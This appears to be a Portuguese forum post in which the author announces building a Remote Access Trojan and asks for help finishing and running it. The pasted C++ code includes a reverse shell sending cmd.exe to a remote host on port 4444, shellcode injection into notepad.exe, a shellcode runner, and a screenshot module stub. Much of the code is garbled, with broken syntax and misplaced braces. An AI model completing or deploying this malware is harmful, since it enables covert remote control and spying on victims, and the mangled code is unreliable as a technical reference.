Estava fazendo um F-SpynetRAT (Remote Access Trojan) e queria uma ajuda, alguém sabe ou já mexeu com isso antes? tipo eu queria muito completar esse carinha aqui e ver ele sendo executado, aqui eu deixo o código fonte dele:
#include <fstream>
#include <iostream>
int main(){
WSADATA wsaData;
SOCKET sock;
sockaddr_in target;
WSAStartup(MAKEWORD(2,2),&wsaData);
sock = WSA_SOCKET(AF_INET, SOCK_STREAM, IP-PROTO_TCP,nullptr,0,0);
target.sin_family = AF_INET;
target.sin_port = htons(4444);
target.sin_addr.s_addr = inet_addr("192.168.1.10");
connect(sock,(sockaddr*)&target,sizeof(target));
STARTUPINFOA si = { sizeof(si)};
PROCESS_INFORMATION
pi;
si.dwFlags = STARTF_US-
ESTDHANDLES;
si.hStdInput =
si.hStdOutput =
si.hStdError = (HANDLE)sock;
CreateProcessA(nullptr,(LPSTR)"cmd.exe",nullptr,
nullptr,&si,&pi);
return 0;
}
#include <fstream>
#include <iostream>
DWORD findProcessId(const std::wstring& processName) {
PROCESSENTRY32pe32 = {sizeof(PROCESSENTRY32)}
do{
if(!processName.compare(pe32.szExeFile)){
}
} while (Process32Next(snapshot,&pe32));
CloseHandle(snapshot);
return 0;
}
return pe32.th32ProcessID;
return 0;
int main(){
DWORD pid = findProcessID(L"notepad.exe");
if(!pid){
std::cerr<<"Target process not found." <<
std::endl;
return 1;
}
HANDLE process = Open-Process(PROCESS_ALL_ACCESS,False,pid);
if(!process){
std::cerr<<"Failed to open target process."<<
std::endl;
}
return 1;
}
unsigned char payload[] =
"\xfc\x48\x83...";//shell-code placeholder
SIZE_T payloadSize =
sizeof(payload);
void* alloc = VirtualAllocEx(process,nullptr,
payloadSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READ-WRITE);
WriteProcessMemory(process,alloc,payloadSize,nullptr);
CreateRemoteThread(
process,nullptr,0,(LPTHREAD_START_ROUTINE)alloc,nullptr,0,nullptr);
CloseHandle(process);
return 0;
}
void run_shellcode(unsigned char* shellcode){
__asm {
mov eax, shellcode
call eax
}
}
class PayloadModule {
public:
virtual void Execute() = 0;
virtual~PayloadModule()
{}
class ScreenshotModule:
public PayloadModule{
public:
void Execute()override{
// Implementation for
// screen capture
}
};
}
#include <fstream>
#include <iostream>
// A placeholder for actual shellcode. Normally you'd generate this with msfvenom or
// similar tools.
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8...";//trimmed for brevity
int main() {
void* exec = VirtualAlloc(
if(exec == nullptr){
std::cerr << "Failed to allocate memory."<< std::endl;
}
return 1;
)
memcpy(exec,shellcode,
sizeof(shellcode));
// Create a new thread
// that begins at the shellcode
Handle thread =
CreateThread(nullptr,0,
(LPTHREAD_START_ROUTINE)exec,nullptr,0,
nullptr);
if(thread == nullptr){
return 1;
}
WaitForSingleObject(thread,INFINITE);
return 0;
}